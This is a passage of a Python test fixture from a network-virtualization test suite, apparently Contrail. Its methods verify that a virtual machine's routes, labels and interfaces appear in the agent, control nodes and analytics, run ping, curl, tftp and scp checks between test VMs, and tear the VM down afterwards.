self.logger.debug('VM %s : Tap interface %s is set to '
' Active' % (self.vm_name,
self.tap_intf[vn_fq_name]['name']))
self.local_ips[vn_fq_name] = self.tap_intf[
vn_fq_name]['mdata_ip_addr']
with self.printlock:
self.logger.debug('Tap interface %s detail : %s' % (
self.tap_intf[vn_fq_name]['name'], self.tap_intf[vn_fq_name]))
with self.printlock:
self.logger.info('Starting Layer 2 verification in Agent')
# L2 verification
self.agent_l2_path[vn_fq_name] = inspect_h.get_vna_layer2_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
mac=self.mac_addr[vn_fq_name])
if not self.agent_l2_path[vn_fq_name]:
with self.printlock:
self.logger.warning('No Layer 2 path is seen for VM MAC '
'%s in agent %s' % (self.mac_addr[vn_fq_name],
self.vm_node_ip))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
else:
with self.printlock:
self.logger.info('Layer 2 path is seen for VM MAC %s '
'in agent %s' % (self.mac_addr[vn_fq_name],
self.vm_node_ip))
self.agent_l2_label[vn_fq_name] = self.agent_l2_path[
vn_fq_name]['routes'][0]['path_list'][0]['label']
self.agent_vxlan_id[vn_fq_name] = self.agent_l2_path[
vn_fq_name]['routes'][0]['path_list'][0]['vxlan_id']
# Check if Tap interface of VM is present in the Agent layer
# route table
if self.agent_l2_path[vn_fq_name]['routes'][0]['path_list'][0]['nh']['itf'] != self.tap_intf[vn_fq_name]['name']:
with self.printlock:
self.logger.warning("Active layer 2 route in agent for "
"%s is not pointing to right tap interface. It is %s "
'' % (self.vm_ip_dict[vn_fq_name],
self.agent_l2_path[vn_fq_name]['routes'][0]['path_list'][0]['nh']['itf']))
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
else:
with self.printlock:
self.logger.info(
'Active layer 2 route in agent is present for VMI %s ' %
(self.tap_intf[vn_fq_name]['name']))
# TODO layer 2 label match is not possibole now as intreface introspect does not have l2 label now.
# Bug 1730
# L2 verification end here
# Check if VN for the VM and route for the VM is present on all
# compute nodes
if not self.verify_in_all_agents(vn_fq_name):
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
# end for vn_fq_name in self.vn_fq_names
self.local_ip = self.local_ips.values()[0]
# Ping to VM IP from host
ping_result = False
for vn_fq_name in self.vn_fq_names:
if self.local_ips[vn_fq_name] != '0.0.0.0':
if self.ping_vm_from_host(vn_fq_name) or self.ping_vm_from_host(vn_fq_name):
ping_result = True
self.local_ip = self.local_ips[vn_fq_name]
with self.printlock:
self.logger.info('The local IP is %s' % self.local_ip)
break
if not ping_result:
with self.printlock:
self.logger.error('Ping to one of the 169.254.x.x IPs of the VM '
'should have passed. It failed! ')
self.vm_in_agent_flag = self.vm_in_agent_flag and False
return False
with self.printlock:
self.logger.info("VM %s Verifications in Agent is fine" %
(self.vm_name))
self.vm_in_agent_flag = self.vm_in_agent_flag and True
return True
# end verify_vm_in_agent
def get_matching_vrf(self, vrf_objs, vrf_name):
return [x for x in vrf_objs if x['name'] == vrf_name][0]
    def reset_state(self, state):
        """Delegate a state reset to the underlying server object
        (``self.obj``); *state* is passed through unchanged."""
        self.obj.reset_state(state)
    def ping_vm_from_host(self, vn_fq_name):
        ''' Ping the VM metadata IP from the host

        SSHes (via fabric) to the compute node hosting the VM and sends a
        single ping to the VM's link-local metadata IP for *vn_fq_name*.

        :returns: True when the ping output contains ' 0% packet loss',
            else False.
        '''
        host = self.inputs.host_data[self.vm_node_ip]
        output = ''
        # fabric's hide()/settings() context managers suppress output and
        # point 'run' at the compute node; warn_only keeps a failed ping
        # from raising.
        with hide('everything'):
            with settings(
                    host_string='%s@%s' % (host['username'], self.vm_node_ip),
                    password=host['password'],
                    warn_only=True, abort_on_prompts=False):
                output = run('ping %s -c 1' % (self.local_ips[vn_fq_name]))
                # Matches ' 0% packet loss' but not '100% packet loss'
                # thanks to the leading space.
                expected_result = ' 0% packet loss'
                self.logger.debug(output)
                if expected_result not in output:
                    self.logger.warn(
                        "Ping to Metadata IP %s of VM %s failed!" %
                        (self.local_ips[vn_fq_name], self.vm_name))
                    return False
                else:
                    self.logger.info(
                        'Ping to Metadata IP %s of VM %s passed' %
                        (self.local_ips[vn_fq_name], self.vm_name))
                    return True
    # end ping_vm_from_host
def verify_in_all_agents(self, vn_fq_name):
''' Verify if the corresponding VN for a VM is present in all compute nodes.
Also verifies that a route is present in all compute nodes for the VM IP
'''
(domain, project, vn_name) = vn_fq_name.split(':')
for compute_ip in self.inputs.compute_ips:
inspect_h = self.agent_inspect[compute_ip]
vn = inspect_h.get_vna_vn(domain, project, vn_name)
# The VN for the VM under test may or may not be present on other agent
# nodes. Proceed to check only if VN is present
if vn is None:
continue
if vn['name'] != vn_fq_name:
self.logger.warn(
'VN %s in agent is not the same as expected : %s ' %
(vn['name'], vn_fq_name))
return False
else:
self.logger.debug('VN %s is found in Agent of node %s' %
(vn['name'], compute_ip))
if not vn['uuid'] in self.vn_ids:
self.logger.warn(
'VN ID %s from agent is in VN IDs list %s of the VM in '
'Agent node %s' % (vn['uuid'], self.vn_ids, compute_ip))
return False
# TODO : To be uncommented once the sandesh query with service-chaining works
# if vn['vrf_name'] != self.agent_vrf_name :
# self.logger.warn('VN VRF of %s in agent is not the same as expected VRF of %s' %( vn['vrf_name'], self.agent_vrf_name ))
# return False
agent_vrf_objs = inspect_h.get_vna_vrf_objs(
domain, project, vn_name)
agent_vrf_obj = self.get_matching_vrf(
self.agent_vrf_objs['vrf_list'],
self.agent_vrf_name[vn_fq_name])
agent_vrf_id = self.agent_vrf_obj[vn_fq_name]['ucindex']
if agent_vrf_id != self.agent_vrf_id[vn_fq_name]:
self.logger.warn(
'VRF id of VN %s is not the same across all agents. '
'Expected : %s, Seen : %s' % (vn['name'],
self.agent_vrf_id[vn_fq_name], agent_vrf_id))
return False
fw_mode = self.vnc_lib_fixture.get_forwarding_mode(vn_fq_name)
if fw_mode != unicode('l2'):
agent_path = inspect_h.get_vna_active_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
ip=self.vm_ip_dict[vn_fq_name], prefix='32')
agent_label = self.agent_path[
vn_fq_name]['path_list'][0]['label']
if agent_label != self.agent_label[vn_fq_name]:
self.logger.warn(
'The route for VM IP %s in Node %s is having incorrect '
'label. Expected : %s, Seen : %s' % (
self.vm_ip_dict[vn_fq_name], compute_ip,
self.agent_label[vn_fq_name], agent_label))
return False
self.logger.debug(
'VRF IDs of VN %s is consistent in agent %s' %
(vn_fq_name, compute_ip))
self.logger.debug(
'Route for VM IP %s is consistent in agent %s ' %
(self.vm_ip_dict[vn_fq_name], compute_ip))
self.logger.debug(
'VN %s verification for VM %s in Agent %s passed ' %
(vn_fq_name, self.vm_name, compute_ip))
self.logger.info(
'Starting all layer 2 verification in agent %s' % (compute_ip))
agent_l2_path = inspect_h.get_vna_layer2_route(
vrf_id=self.agent_vrf_id[vn_fq_name],
mac=self.mac_addr[vn_fq_name])
agent_l2_label = self.agent_l2_path[vn_fq_name][
'routes'][0]['path_list'][0]['label']
if agent_l2_label != self.agent_l2_label[vn_fq_name]:
self.logger.warn('The route for VM MAC %s in Node %s '
'is having incorrect label. Expected : %s, Seen : %s'
% (self.mac_addr[vn_fq_name], compute_ip,
self.agent_l2_label[vn_fq_name], agent_l2_label))
return False
self.logger.info(
'Route for VM MAC %s is consistent in agent %s ' %
(self.mac_addr[vn_fq_name], compute_ip))
# end for
return True
# end verify_in_all_agents
def ping_to_ip(self, ip, return_output=False, other_opt='', size='56', count='5'):
'''Ping from a VM to an IP specified.
This method logs into the VM from the host machine using ssh and runs ping test to an IP.
'''
host = self.inputs.host_data[self.vm_node_ip]
output = ''
fab_connections.clear()
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
with hide('everything'):
with settings(host_string='%s@%s' % (host['username'],
self.vm_node_ip), password=host[
'password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
output = run_fab_cmd_on_node(
host_string='%s@%s' % (
self.vm_username, self.local_ip),
password=self.vm_password,
cmd='ping -s %s -c %s %s %s' % (str(size), str(count), other_opt, ip))
self.logger.debug(output)
if return_output == True:
# return_list=[]
return output
except Exception, e:
self.logger.exception(
'Exception occured while trying ping from VM ')
return False
expected_result = ' 0% packet loss'
if expected_result not in output:
self.logger.warn("Ping to IP %s from VM %s failed" %
(ip, self.vm_name))
return False
else:
self.logger.info('Ping to IP %s from VM %s passed' %
(ip, self.vm_name))
return True
# end ping_to_ip
def ping_to_ipv6(self, ipv6, return_output=False, other_opt='', count='5', intf='eth0'):
'''Ping from a VM to an IPV6 specified.
This method logs into the VM from the host machine using ssh and runs ping6 test to an IPV6.
'''
host = self.inputs.host_data[self.vm_node_ip]
output = ''
fab_connections.clear()
try:
self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
with hide('everything'):
with settings(
host_string='%s@%s' % (
host['username'], self.vm_node_ip),
password=host['password'],
warn_only=True, abort_on_prompts=False):
key_file = self.nova_fixture.tmp_key_file
output = run_fab_cmd_on_node(
host_string='%s@%s' % (
self.vm_username, self.local_ip),
password=self.vm_password,
cmd='ping6 -I %s -c %s %s %s' % (str(intf), str(count), other_opt, ipv6))
self.logger.debug(output)
if return_output == True:
return output
except Exception, e:
self.logger.exception(
'Exception occured while trying ping from VM ')
return False
expected_result = ' 0% packet loss'
if expected_result not in output:
self.logger.warn("Ping6 to IPv6 %s from VM %s failed" %
(ipv6, self.vm_name))
return False
else:
self.logger.debug('Ping6 to IP %s from VM %s passed' %
(ipv6, self.vm_name))
return True
# end ping_to_ipv6
@retry(delay=1, tries=20)
def ping_with_certainty(self, ip, return_output=False, other_opt='', size='56', count='5', expectation=True):
'''
Better to call this instead of ping_to_ip.
Set expectation to False if you want ping to fail
Can be used for both ping pass and fail scenarios with retry
'''
if expectation:
return self.ping_to_ip(ip, return_output, other_opt, size, count)
else:
return not self.ping_to_ip(ip, return_output, other_opt, size, count)
    @retry(delay=2, tries=20)
    def verify_vm_not_in_agent(self):
        '''Verify that the VM is fully removed in all Agents.

        Checks, in order: the VM is gone from nova's server list, from the
        local agent's active VM list and tap interfaces, and that its /32
        routes are gone from every compute's agent.  Unlike most verify_*
        methods this one accumulates failures instead of returning early.
        The verdict is mirrored in self.verify_vm_not_in_agent_flag.
        '''
        result = True
        self.verify_vm_not_in_agent_flag = True
        inspect_h = self.agent_inspect[self.vm_node_ip]
        if self.vm_obj in self.nova_fixture.get_vm_list():
            with self.printlock:
                self.logger.warn("VM %s is still found in Compute(nova) "
                                 "server-list" % (self.vm_name))
            self.verify_vm_not_in_agent_flag = self.verify_vm_not_in_agent_flag and False
            result = result and False
        # Check if VM is in agent's active VMList:
        if self.vm_id in inspect_h.get_vna_vm_list():
            with self.printlock:
                self.logger.warn("VM %s is still present in agent's active "
                                 "VMList" % (self.vm_name))
            self.verify_vm_not_in_agent_flag = self.verify_vm_not_in_agent_flag and False
            result = result and False
        if len(inspect_h.get_vna_tap_interface_by_vm(vm_id=self.vm_id)) != 0:
            with self.printlock:
                self.logger.warn("VMI/TAP interface(s) is still seen for VM "
                                 "%s in agent" % (self.vm_name))
            self.verify_vm_not_in_agent_flag = self.verify_vm_not_in_agent_flag and False
            result = result and False
        for vn_fq_name in self.vn_fq_names:
            for compute_ip in self.inputs.compute_ips:
                # Note: inspect_h is rebound here to each compute's agent.
                inspect_h = self.agent_inspect[compute_ip]
                if inspect_h.get_vna_active_route(
                        vrf_id=self.agent_vrf_id[vn_fq_name],
                        ip=self.vm_ip_dict[vn_fq_name],
                        prefix='32') is not None:
                    self.logger.warn(
                        "Route for VM %s, IP %s is still seen in agent %s " %
                        (self.vm_name, self.vm_ip_dict[vn_fq_name], compute_ip))
                    self.verify_vm_not_in_agent_flag = self.verify_vm_not_in_agent_flag and False
                    result = result and False
        if result:
            self.logger.info(
                "VM %s is removed in Compute, and routes are removed "
                "in all agent nodes" % (self.vm_name))
        return result
    # end verify_vm_not_in_agent
def get_control_nodes(self):
bgp_ips = {}
vm_host = self.vm_node_ip
try:
bgp_ips = self.inputs.build_compute_to_control_xmpp_connection_dict(self.connections)
bgp_ips = bgp_ips[vm_host]
except Exception as e:
self.logger.exception("Exception in get_control_nodes....")
finally:
return bgp_ips
    @retry(delay=5, tries=6)
    def verify_vm_in_control_nodes(self):
        ''' Validate routes are created in Control-nodes for this VM

        For every VN of the VM and every relevant control node it checks
        the inet /32 route (skipped for l2-only VNs) and the enet (L2 MAC)
        route: presence, next-hop equal to the compute's data IP, and a
        label matching what the agent advertised.  Fills self.ri_names and
        mirrors the verdict in self.vm_in_cn_flag.
        '''
        self.vm_in_cn_flag = True
        self.ri_names={}
        # With 2 or fewer control nodes, check all of them; otherwise only
        # the ones this compute actually peers with over XMPP.
        if (len(self.inputs.bgp_ips) <= 2):
            self.bgp_ips = []
            self.bgp_ips = self.inputs.bgp_ips[:]
        else:
            self.bgp_ips = self.get_control_nodes()
        for vn_fq_name in self.vn_fq_names:
            fw_mode= self.vnc_lib_fixture.get_forwarding_mode(vn_fq_name)
            # for cn in self.inputs.bgp_ips:
            for cn in self.bgp_ips:
                # Default routing instance name is <vn_fq_name>:<vn_name>.
                vn_name= vn_fq_name.split(':')[-1]
                ri_name= vn_fq_name + ':' + vn_name
                self.ri_names[vn_fq_name]= ri_name
                if fw_mode != unicode('l2'):
                    # Check for VM route in each control-node
                    #vn_name= vn_fq_name.split(':')[-1]
                    #ri_name= vn_fq_name + ':' + vn_name
                    #self.ri_names[vn_fq_name]= ri_name
                    cn_routes = self.cn_inspect[cn].get_cn_route_table_entry(
                        ri_name=ri_name,
                        prefix=self.vm_ip_dict[vn_fq_name] + '/32')
                    if not cn_routes:
                        with self.printlock:
                            self.logger.warn(
                                'No route found for VM IP %s in Control-node %s' %
                                (self.vm_ip_dict[vn_fq_name], cn))
                        self.vm_in_cn_flag = self.vm_in_cn_flag and False
                        return False
                    if cn_routes[0]['next_hop'] != self.vm_node_data_ip:
                        with self.printlock:
                            self.logger.warn(
                                'Next hop for VM %s is not set to %s in Control-node'
                                ' Route table' % (self.vm_name, self.vm_node_data_ip))
                        self.vm_in_cn_flag = self.vm_in_cn_flag and False
                        return False
                    # Label in agent and control-node should match
                    if cn_routes[0]['label'] != self.agent_label[vn_fq_name]:
                        with self.printlock:
                            self.logger.warn(
                                "Label for VM %s differs between Control-node "
                                "%s and Agent, Expected: %s, Seen: %s" %
                                (self.vm_name, cn, self.agent_label[
                                    vn_fq_name],
                                 cn_routes[0]['label']))
                            self.logger.debug(
                                'Route in CN %s : %s' % (cn, str(cn_routes)))
                        self.vm_in_cn_flag = self.vm_in_cn_flag and False
                        return False
                self.logger.info(
                    'Starting all layer2 verification in %s Control Node' % (cn))
                # L2 verification
                # enet table entries are keyed by "<mac>,<ip>/32".
                prefix = self.mac_addr[vn_fq_name] + \
                    ',' + self.vm_ip_dict[vn_fq_name] + '/32'
                cn_l2_routes = self.cn_inspect[cn].get_cn_route_table_entry(
                    ri_name=ri_name, prefix=prefix, table='enet.0')
                if not cn_l2_routes:
                    self.logger.warn(
                        'No layer2 route found for VM MAC %s in Control-node %s'
                        '' % (self.mac_addr[vn_fq_name], cn))
                    self.vm_in_cn_flag = self.vm_in_cn_flag and False
                    return False
                else:
                    self.logger.info(
                        'Layer2 route found for VM MAC %s in \
                        Control-node %s' % (self.mac_addr[vn_fq_name], cn))
                if cn_l2_routes[0]['next_hop'] != self.vm_node_data_ip:
                    self.logger.warn(
                        "Next hop for VM %s is not set to %s in "
                        "Control-node Route table" % (self.vm_name,
                                                      self.vm_node_data_ip))
                    self.vm_in_cn_flag = self.vm_in_cn_flag and False
                    return False
                # For vxlan encap compare against the agent's vxlan id,
                # otherwise against the agent's L2 MPLS label.
                if cn_l2_routes[0]['tunnel_encap'][0] == 'vxlan':
                    # Label in agent and control-node should match
                    if cn_l2_routes[0]['label'] != self.agent_vxlan_id[vn_fq_name]:
                        with self.printlock:
                            self.logger.warn(
                                "L2 Label for VM %s differs between Control-node "
                                "%s and Agent, Expected: %s, Seen: %s" %
                                (self.vm_name, cn, self.agent_vxlan_id[
                                    vn_fq_name],
                                 cn_l2_routes[0]['label']))
                            self.logger.debug(
                                'Route in CN %s : %s' % (cn, str(cn_l2_routes)))
                        self.vm_in_cn_flag = self.vm_in_cn_flag and False
                        return False
                    else:
                        with self.printlock:
                            self.logger.info(
                                "L2 Label for VM %s same between Control-node "
                                "%s and Agent, Expected: %s, Seen: %s" %
                                (self.vm_name, cn,
                                 self.agent_vxlan_id[vn_fq_name],
                                 cn_l2_routes[0]['label']))
                else:
                    # Label in agent and control-node should match
                    if cn_l2_routes[0]['label'] != self.agent_l2_label[vn_fq_name]:
                        with self.printlock:
                            self.logger.warn(
                                "L2 Label for VM %s differs between Control-node "
                                "%s and Agent, Expected: %s, Seen: %s" %
                                (self.vm_name, cn, self.agent_l2_label[
                                    vn_fq_name],
                                 cn_l2_routes[0]['label']))
                            self.logger.debug(
                                'Route in CN %s : %s' % (cn, str(cn_l2_routes)))
                        self.vm_in_cn_flag = self.vm_in_cn_flag and False
                        return False
                    else:
                        with self.printlock:
                            self.logger.info(
                                "L2 Label for VM %s same between Control-node "
                                "%s and Agent, Expected: %s, Seen: %s" %
                                (self.vm_name, cn,
                                 self.agent_l2_label[vn_fq_name],
                                 cn_l2_routes[0]['label']))
        # end for
        self.vm_in_cn_flag = self.vm_in_cn_flag and True
        with self.printlock:
            self.logger.info(
                "Verification in Control-nodes for VM %s passed" % (self.vm_name))
        return True
    # end verify_vm_in_control_nodes
@retry(delay=2, tries=15)
def verify_vm_not_in_control_nodes(self):
    ''' Validate that routes for VM is removed in control-nodes.

    Retried via @retry since route withdrawal after VM deletion is
    asynchronous. Returns True only when no control-node still carries a
    /32 route for any of this VM's IPs; the outcome is also mirrored in
    self.verify_vm_not_in_control_nodes_flag for the cleanUp() checks.
    '''
    result = True
    self.verify_vm_not_in_control_nodes_flag = True
    for vn_fq_name in self.vn_fq_names:
        # for cn in self.inputs.bgp_ips:
        for cn in self.bgp_ips:
            # Check for VM route in each control-node
            # NOTE(review): routing_instance is fetched but never used.
            routing_instance = self.cn_inspect[cn].get_cn_routing_instance(
                ri_name=self.ri_names[vn_fq_name])
            cn_routes = self.cn_inspect[cn].get_cn_route_table_entry(
                ri_name=self.ri_names[vn_fq_name],
                prefix=self.vm_ip_dict[vn_fq_name] + '/32')
            if cn_routes is not None:
                # Route still present: flag failure but keep scanning the
                # remaining control-nodes so every offender gets logged.
                with self.printlock:
                    self.logger.warn(
                        "Control-node %s still seems to have route for VMIP %s" %
                        (cn, self.vm_ip_dict[vn_fq_name]))
                self.verify_vm_not_in_control_nodes_flag = self.verify_vm_not_in_control_nodes_flag and False
                result = result and False
    # end for
    if result:
        with self.printlock:
            self.logger.info(
                "Routes for VM %s is removed in all control-nodes"
                % (self.vm_name))
    return result
# end verify_vm_not_in_control_nodes
def _get_ops_intf_index(self, ops_intf_list, vn_fq_name):
for intf in ops_intf_list:
if intf['virtual_network'] == vn_fq_name:
return ops_intf_list.index(intf)
return None
@retry(delay=2, tries=15)
def verify_vm_in_opserver(self):
    ''' Verify VM objects in Opserver.

    Cross-checks on every collector: the VM UVE's interface list, per-VN
    IP addresses (skipped for L2-only networks), VN-UVE membership, the
    vrouter UVE (all collectors must agree on which compute hosts the
    VM), the tap-interface entries, and the VM UVE link. Failures are
    accumulated in `result` and mirrored in self.vm_in_op_flag.
    '''
    self.logger.info("Verifying the vm in opserver")
    result = True
    self.vm_in_op_flag = True
    for ip in self.inputs.collector_ips:
        self.logger.info("Verifying in collector %s ..." % (ip))
        self.ops_vm_obj = self.ops_inspect[ip].get_ops_vm(self.vm_id)
        ops_intf_list = self.ops_vm_obj.get_attr('Agent', 'interface_list')
        if not ops_intf_list:
            self.logger.warn(
                'Failed to get VM %s, ID %s info from Opserver' %
                (self.vm_name, self.vm_id))
            self.vm_in_op_flag = self.vm_in_op_flag and False
            return False
        for vn_fq_name in self.vn_fq_names:
            vm_in_pkts = None
            vm_out_pkts = None
            fw_mode = self.vnc_lib_fixture.get_forwarding_mode(vn_fq_name)
            ops_index = self._get_ops_intf_index(ops_intf_list, vn_fq_name)
            if ops_index is None:
                self.logger.error(
                    'VN %s is not seen in opserver for VM %s' %
                    (vn_fq_name, self.vm_id))
                self.vm_in_op_flag = self.vm_in_op_flag and False
                return False
            ops_data = ops_intf_list[ops_index]
            # L2-only networks carry no L3 address, so skip the IP check.
            if fw_mode != unicode('l2'):
                if self.vm_ip_dict[vn_fq_name] != ops_data['ip_address']:
                    self.logger.warn(
                        "VM %s IP Address of %s not in Opserver VM view"
                        " " % (self.vm_name, self.vm_ip_dict[vn_fq_name]))
                    self.vm_in_op_flag = self.vm_in_op_flag and False
                    result = result and False
                # end if
                self.ops_vm_obj = self.ops_inspect[ip].get_ops_vm(self.vm_id)
            # end if
        self.logger.info("Verifying vm in vn uve")
        # NOTE(review): fw_mode below is whatever the last VN iteration
        # left behind — confirm that is intentional.
        for intf in ops_intf_list:
            virtual_network = intf['virtual_network']
            ip_address = intf['ip_address']
            intf_name = intf['name']
            self.logger.info("vm uve shows interface as %s" % (intf_name))
            if fw_mode != unicode('l2'):
                self.logger.info("vm uve shows ip address as %s" %
                                 (ip_address))
            self.logger.info("vm uve shows virtual netowrk as %s" %
                             (virtual_network))
            vm_in_vn_uve = self.analytics_obj.verify_vn_uve_for_vm(
                vn_fq_name=virtual_network, vm=self.vm_id)
            if vm_in_vn_uve:
                self.vm_in_op_flag = self.vm_in_op_flag and True
                result = result and True
            else:
                self.vm_in_op_flag = self.vm_in_op_flag and False
                result = result and False
    # Verifying vm in vrouter-uve
    self.logger.info("Verifying vm in vrouter uve")
    computes = []
    for ip in self.inputs.collector_ips:
        self.logger.info("Getting info from collector %s.." % (ip))
        agent_host = self.analytics_obj.get_ops_vm_uve_vm_host(
            ip, self.vm_id)
        if agent_host not in computes:
            computes.append(agent_host)
    # Every collector must report the same hosting compute for the VM.
    if (len(computes) > 1):
        self.logger.warn(
            "Inconsistancy - collectors dont have consistant info for vm uve")
        self.vm_in_op_flag = self.vm_in_op_flag and False
        result = result and False
    self.logger.info("vm uve shows vrouter as %s" % (computes))
    for compute in computes:
        vm_in_vrouter = self.analytics_obj.verify_vm_list_in_vrouter_uve(
            vm_uuid=self.vm_id, vrouter=compute)
        if vm_in_vrouter:
            self.vm_in_op_flag = self.vm_in_op_flag and True
            result = result and True
        else:
            self.vm_in_op_flag = self.vm_in_op_flag and False
            result = result and False
    # Verify tap interface/conected networks in vrouter uve
    self.logger.info("Verifying vm tap interface/vn in vrouter uve")
    self.vm_host = self.inputs.host_data[self.vm_node_ip]['name']
    self.tap_interfaces = self.agent_inspect[
        self.vm_node_ip].get_vna_tap_interface_by_vm(vm_id=self.vm_id)
    for intf in self.tap_interfaces:
        self.tap_interface = intf['config_name']
        self.logger.info("expected tap interface of vm uuid %s is %s" %
                         (self.vm_id, self.tap_interface))
        self.logger.info("expected virtual network of vm uuid %s is %s" %
                         (self.vm_id, intf['vn_name']))
        is_tap_thr = self.analytics_obj.verify_vm_list_in_vrouter_uve(
            vm_uuid=self.vm_id,
            vn_fq_name=intf['vn_name'],
            vrouter=self.vm_host,
            tap=self.tap_interface)
        if is_tap_thr:
            self.vm_in_op_flag = self.vm_in_op_flag and True
            result = result and True
        else:
            self.vm_in_op_flag = self.vm_in_op_flag and False
            result = result and False
    # The VM UVE must also be linked into the overall UVE graph.
    if self.analytics_obj.verify_vm_link(self.vm_id):
        self.vm_in_op_flag = self.vm_in_op_flag and True
        result = result and True
    else:
        self.vm_in_op_flag = self.vm_in_op_flag and False
        result = result and False
    if result:
        self.logger.info("VM %s validation in Opserver passed" %
                         (self.vm_name))
    else:
        self.logger.warn('VM %s validation in Opserver failed' %
                         (self.vm_name))
    return result
# end verify_vm_in_opserver
@retry(delay=3, tries=15)
def tcp_data_transfer(self, localip, fip, datasize=1024):
    '''Send data file from a VM to an IP specified.

    This method logs into the VM from the host machine using ssh and sends a
    data file to an IP. Success is judged by curl receiving an HTTP 200
    from the target; @retry re-attempts the transfer on failure.
    '''
    target_url = 'http://%s/' % fip
    curl_cmd = 'curl -I -m 25 --connect-timeout 25 %s' % target_url
    self.run_cmd_on_vm(cmds=[curl_cmd])
    response = self.return_output_values_list[0]
    transferred = '200 OK' in response
    if transferred:
        self.logger.info("Tcp data transfer to IP %s from VM %s"
                         " Passed" % (fip, self.vm_name))
    else:
        self.logger.warn("Tcp data transfer to IP %s from VM %s"
                         " failed" % (fip, self.vm_name))
    return transferred
# end tcp_data_transfer
def cleanUp(self):
    '''Delete the fixture's VM(s) — unless cleanup is disabled or the VM
    pre-existed — and, when verify_on_setup ran, verify in parallel that
    every component (API server, agent, control nodes, nova, vrouter
    flows, opserver) has forgotten the VM.
    '''
    super(VMFixture, self).cleanUp()
    do_cleanup = True
    if self.inputs.fixture_cleanup == 'no':
        do_cleanup = False
    if self.already_present:
        # Never delete a VM that this fixture did not create...
        do_cleanup = False
    if self.inputs.fixture_cleanup == 'force':
        # ...unless cleanup is explicitly forced.
        do_cleanup = True
    if do_cleanup:
        if self.inputs.webui_config_flag:
            self.webui.vm_delete_in_openstack(self)
        else:
            for vm_obj in self.vm_objs:
                for sec_grp in self.sg_ids:
                    self.logger.info(
                        "Removing the security group from VM %s" % (vm_obj.name))
                    self.remove_security_group(sec_grp)
                self.logger.info("Deleting the VM %s" % (vm_obj.name))
                self.nova_fixture.delete_vm(vm_obj)
        time.sleep(5)
        # Not expected to do verification when self.count is > 1, right now
        if self.verify_is_run:
            # Each negative verification polls with @retry, so they are run
            # concurrently to keep teardown time bounded.
            t_api = threading.Thread(
                target=self.verify_vm_not_in_api_server, args=())
            # t_api.daemon = True
            t_api.start()
            time.sleep(1)
            t_agent = threading.Thread(
                target=self.verify_vm_not_in_agent, args=())
            t_agent.start()
            time.sleep(1)
            t_cn = threading.Thread(
                target=self.verify_vm_not_in_control_nodes, args=())
            t_cn.start()
            time.sleep(1)
            t_nova = threading.Thread(
                target=self.verify_vm_not_in_nova, args=())
            t_nova.start()
            time.sleep(1)
            t_flow = threading.Thread(
                target=self.verify_vm_flows_removed, args=())
            t_flow.start()
            time.sleep(1)
            t_op_list = []
            for vn_fq_name in self.vn_fq_names:
                t_op = threading.Thread(
                    target=self.analytics_obj.verify_vm_not_in_opserver,
                    args=(self.vm_id, self.inputs.host_data[self.vm_node_ip]['name'], vn_fq_name))
                t_op.start()
                time.sleep(1)
                t_op_list.append(t_op)
            t_nova.join()
            t_api.join()
            t_agent.join()
            t_cn.join()
            for t in t_op_list:
                t.join()
            # NOTE(review): t_flow is started but never join()ed, yet
            # vm_flows_removed_flag is read below — possible race; confirm.
            self.verify_vm_not_in_setup = (self.verify_vm_not_in_api_server_flag and self.verify_vm_not_in_agent_flag and
                                           self.verify_vm_not_in_control_nodes_flag and
                                           self.verify_vm_not_in_nova_flag and
                                           self.vm_flows_removed_flag)
            # Trying a workaround for Bug 452
            assert self.verify_vm_not_in_api_server_flag
            assert self.verify_vm_not_in_agent_flag
            assert self.verify_vm_not_in_control_nodes_flag
            assert self.verify_vm_not_in_nova_flag
        # end if
    else:
        self.logger.info('Skipping the deletion of VM %s' %
                         (self.vm_name))
# end cleanUp
@retry(delay=2, tries=25)
def verify_vm_not_in_nova(self):
    '''Report whether every VM of this fixture is gone from the nova DB.

    Also records the outcome in self.verify_vm_not_in_nova_flag, which
    cleanUp() consults after its verification threads finish.
    '''
    all_deleted = True
    for vm_obj in self.vm_objs:
        deleted = self.nova_fixture.is_vm_deleted_in_nova_db(
            vm_obj, self.inputs.openstack_ip)
        all_deleted = all_deleted and deleted
    self.verify_vm_not_in_nova_flag = self.verify_vm_not_in_nova_flag and all_deleted
    return all_deleted
# end verify_vm_not_in_nova
def tftp_file_to_vm(self, file, vm_ip):
    '''Tftp-put the specified file from this VM to the given IP.

    (Docstring corrected: this method uses atftp, not scp.) Runs the
    transfer from inside the VM, reached via its compute node with
    fabric; failures are logged, not raised.
    '''
    host = self.inputs.host_data[self.vm_node_ip]
    output = ''
    try:
        self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
        with hide('everything'):
            with settings(
                    host_string='%s@%s' % (
                        host['username'], self.vm_node_ip),
                    password=host['password'],
                    warn_only=True, abort_on_prompts=False):
                # NOTE(review): key_file is fetched but unused here.
                key_file = self.nova_fixture.tmp_key_file
                # timeout(1) guards against atftp hanging indefinitely.
                i = 'timeout 20 atftp -p -r %s -l %s %s' % (file,
                                                            file, vm_ip)
                self.run_cmd_on_vm(cmds=[i])
    except Exception, e:
        self.logger.exception(
            'Exception occured while trying to tftp the file')
# end tftp_file_to_vm
def scp_file_to_vm(self, file, vm_ip, dest_vm_username='ubuntu'):
    '''Do a scp of the specified file to the specified VM.

    Copies from inside this VM to dest_vm_username@vm_ip using the test
    key (id_rsa is first fetched into the VM via get_rsa_to_vm).
    Failures are logged, not raised.
    '''
    host = self.inputs.host_data[self.vm_node_ip]
    output = ''
    try:
        self.nova_fixture.put_key_file_to_host(self.vm_node_ip)
        with hide('everything'):
            with settings(
                    host_string='%s@%s' % (
                        host['username'], self.vm_node_ip),
                    password=host['password'],
                    warn_only=True, abort_on_prompts=False):
                # NOTE(review): key_file is fetched but unused here.
                key_file = self.nova_fixture.tmp_key_file
                self.get_rsa_to_vm()
                # timeout(1) bounds a hung scp; StrictHostKeyChecking=no
                # avoids an interactive known_hosts prompt inside the VM.
                i = 'timeout 20 scp -o StrictHostKeyChecking=no -i id_rsa %s %s@%s:' % (
                    file, dest_vm_username, vm_ip)
                cmd_outputs = self.run_cmd_on_vm(cmds=[i])
                self.logger.debug(cmd_outputs)
    except Exception, e:
        self.logger.exception(
